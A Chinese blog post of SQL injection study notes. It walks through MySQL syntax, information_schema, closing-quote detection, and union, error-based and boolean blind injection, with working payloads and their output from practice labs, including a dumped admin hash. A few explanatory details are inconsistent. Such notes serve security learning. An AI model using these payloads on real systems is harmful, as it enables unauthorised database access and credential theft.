SQL注入学习笔记整理
Posted 漏了个大洞
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入学习笔记整理相关的知识,希望对你有一定的参考价值。
1、sql注入的基础知识
1.11、数据库中的逻辑运算符
或 且 非
or and not
真 且 真 =真
真 且 假 =假
真 或 假 =真
and 比 or 的优先级要高
1.12、mysql相关语法
注释:
#
-- --空格
/* */
/*! */ 内联查询
常见函数与参数:
substring(string,position) 从某个位置开始截取字符串
substr(string,start,length) 截取字符串的一部分
left(str,length) 从左开始截取指定长度的字符串
ASCII(str1)
返回字符串str的最左面字符的ASCII代码值
ORD() 函数
ORD() 函数返回字符串第一个字符的ASCII 值
深度讲解:sql语句
1.2、数据库的版本
一般以5.0区分
1、在mysql 5.0以上版本中,
mysql存在一个自带数据库名为information_schema,
它是一个存储记录所有数据库名、表名、列名的数据库
information_schema``````````````sql自带的元库
----schemata··············记录库名的表
--------schema_name·········库名
----tables···················记录表名的表
--------table_schema··········库名
--------table_name·············表名
----columns················记录列名的表
--------table_schema··········库名
--------table_name
--------column_name··········列名
也相当于可以通过查询它来获取指定数据库下面的表名或列名信息,因此在注入的第一步就是获取数据库的版本和库名
2、而低版本,采取暴力查询或结合读取查询
1.3、信息收集
数据库版本 version() 5.7.22-0ubuntu0.16.04.1
数据库名字 database() mozhe_Discuz_StormGroup
数据库用户 user() root@localhost
操作系统 @@version_compile_os
数据库中符号"."代表下一级,如xiao.user表示xiao数据库下的user表名
1.4、注入思路
SQL注入思路
御剑扫描网站后台
思路如下:
1 判断交互方式 get/post/http head
2 预判数据库执行语句
3 判断提交数据的闭合方式 整形、‘ ’、“ ”,(),(‘ ’),(“ ”) 快速判断闭合方式 and 1=1 和and 1=2
4 构造语句打破闭合
5 构造联合查询判断输出位 通过order by 判断列数 建议使用二分法
1.5、注入分类
根据注入点的分类
根据注入手法分类
2、注入过程
2.1、SQL 注入点的判断
?id=34 +1/-1-------页面有回显--------联合查询(可跨库、跨表)
猜测代码:select * from tablename where id=$id
字符型?数字型?
?id=35' ---------报错有回显--------报错注入
报错:near ' ' ' at line 1-----------左右两边的'是报错语句自带的
说明错误代码多了一个 '
' 前面的代码正确,说明是数字型
猜测代码:select * from tablename where id=35'
?id=35 and 1=1 是否有布尔类型的状态-------布尔盲注
?id=35 and 1=2
猜测代码:select * from tablename where id=35 and 1=1
猜测代码:select * from tablename where id=35 and 1=2
?id=35 and sleep(5) 观察是否有延时显示-----延时注入
通过浏览器F12,网络,时间线即可准确判断
2.2、确定闭合符
数字型,一般没有闭合符
字符型,一定有闭合符
常见闭合符:
' 单引号
" 双引号
( )括号
[ ] 方括号
以上四种均可以自由组合
2.21有报错回显的情况
报错回显是最简单的判断闭合符方法,举例:
?id=1' 报错:near ' ' ' at line 1-----------左右两边的'是报错语句自带的
说明错误代码多了一个 ' , ' 前面的代码正确,说明是数字型。
?id=1' 报错:near ''1'' LIMIT 0,1' at line 1-----去掉报错语句的两个单引号后,真正的报错语句:'1'' LIMIT 0,1
由于1'是我们自己输入的,所以剩下的闭合符:' ' 两个单引号
因此闭合符为单引号。
进一步确定闭合符:
注释:?id=1' --+ 回显正常,说明就是单引号闭合
?id=1' and '1'='1 回显正常,说明就是单引号闭合
2.22、无报错回显,只能猜
1、猜测:where id=$id
id=1 and 1=1 正常
id=1 and 1=2 不正常
2、猜测:where id=’$id’
id=1’ and ‘1’=‘1 正常
id=1’ and ‘1’=‘2 错误(这时,可以确定sql语句可以正常执行了)
3、猜测:where id="$id"
id=1" and “1”=“1 正常
id=1” and “1”="2 正常
4、猜测:where id=(’$id’)
id=1’) and (‘1’=‘1 正常
id=1’) and (‘1’=‘2 错误(这时,可以确定sql语句可以正常执行了,排除上面单引号闭合)
5、猜测:where id=((’$id’))
id=1’)) and ((‘1’=‘1 正常
id=1’)) and ((‘1’=‘1 错误(这时,可以确定sql语句可以正常执行了,排除上面 ') 方式闭合)
6、猜测:where id=(((’$id’)))
id=1’))) and (((‘1’='1 错误,并且,这里的错误与前面的不一样,具体看下面的截图
到这里,单引号加括号的组合就不用再试了,最有可能的就是 ‘))
7、猜测:where id=("$id")
id=1") and (“1”=“1 正常
id=1”) and (“1”="2 正常
到这里已经可以肯定闭合符号就是’))
————————————————
特别注意:
-
在测试闭合符号的时候,如果sql语句能够执行,闭合符号也不一定正确,在测试的过程中要注意这种带括号的闭合符号,避免出错
-
有括号的时候,不带括号,或者括号少于真实数量的时候,sql语句是可以执行的,但是后面如果要拼接order by、union select这样子就不行了。
2.3、联合查询
union select:联合查询的解释
order by
作用是判断当前table的字段数,这是进行union select的必要条件
在这里使用1,2,3,4,5,6,7。。。。。
是因为数字可以自动转换成字符串,所以符合联合查询的要求
获取基础数据
union select database(),user()
-
database()将会返回当前网站所使用的数据库名字.
-
user()将会返回执行当前查询的用户名.
union select version(),@@version_compile_os
-
version() 获取当前数据库版本.
-
@@version_compile_os 获取当前操作系统
获取表名,字段(列)名
获取指定数据
pikachu第二关测试
SQL injections Less-2 模拟
获取所有数据库名
id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
回显 information_schema,challenges,db1,mysql,performance_schema,pikachu,security,sys
获取指定数据库名下的表名信息
id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pikachu'
回显
httpinfo,member,message,users,xssblind
获取指定数据库pikachu下表users的列名数据
id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='pikachu'
回显
id,username,password,level
获取指定表内的数据
id=-1 union select 1,username,password from pikachu.users
回显
admin e10adc3949ba59abbe56e057f20f883e
2.4、报错注入
2.41、 updatexml报错
首先了解下updatexml()函数
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串),如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
改变XML_document中符合XPATH_string的值
而我们的注入语句为:
updatexml(1,concat(0x7e,database(),0x7e),1) sqli-labs第20关验证
其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
id=1' 错误 id=1" 正常 id=1' --+正常,说明是单引号字符串
?id=-1' and updatexml(1,concat(0x7e,version(),0x7e),1) --+ 回显版本5.7.26
替换database()得到security
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+
回显 '~emails,referers,uagents,users~'
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
回显 '~id,username,password~'
?id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+
回显用户名,因为updatexml()这个函数最多只能爆32位字符,而我们要爆的数据超过了这个位数,所以我们一个一个的查,使用limit 0,1来实现
'~flag{f99c688f101bb53fdbf178a89182e}'
flag{f99c688f101bb53fdbf178ad0889182e}
2.42、extractvalue报错
?id=1 and extractvalue(1,concat(0x7e,(select user()))) --+
使用方法与updatexml一样
2.43、floor报错 即双查询注入
?id=1' union Select 1,count(*),concat((select user()),floor(rand(0)*2)) as a from information_schema.columns group by a--+
回显 'root@localhost1'
-----------------------------
?id=1' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
回显所有数据库名(最多64字符)
----------------------------------
?id=1' union select count(*),1, concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a --+
回显第一个表名
--------------------------------
?id=1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a --+
回显第一个列名
------------------------------
?id=1' union select count(*),1, concat('~',(select username from users limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a --+
回显 第一个用户名
特别注意:
updatexml和extractvalue爆出来的数据最多只有32位,但是数据库存的是password的MD5值,有32位,所以说得到的md5是不对的,需要进行两次注入才能得到完整的密码,以extractvalue()函数为例:
user=123' or extractvalue(1,concat((select concat(0x7e,password) from manage)))#&password=
user=123' or extractvalue(1,concat((select concat(password,0x7e) from manage)))#&password=
————————————————
2.5、布尔盲注
?id=35 and 1=1 正常
?id=35 and 1=2 异常
说明存在布尔类型的状态-------布尔盲注
1首先猜长度
?id=35 and length(database())<10 正常说明数据库名的长度小于10
?id=35 and length(database())<5 错误说明长度大于5
?id=35 and length(database())=3 正常说明长度为3
2从第一个字母开始猜
?id=35 and ascii(substr(database(),1,1))>64 判断第一个字母的ascii是否>68
二分法,极限中的夹逼准则,能够减少猜测次数
以上是关于SQL注入学习笔记整理的主要内容,如果未能解决你的问题,请参考以下文章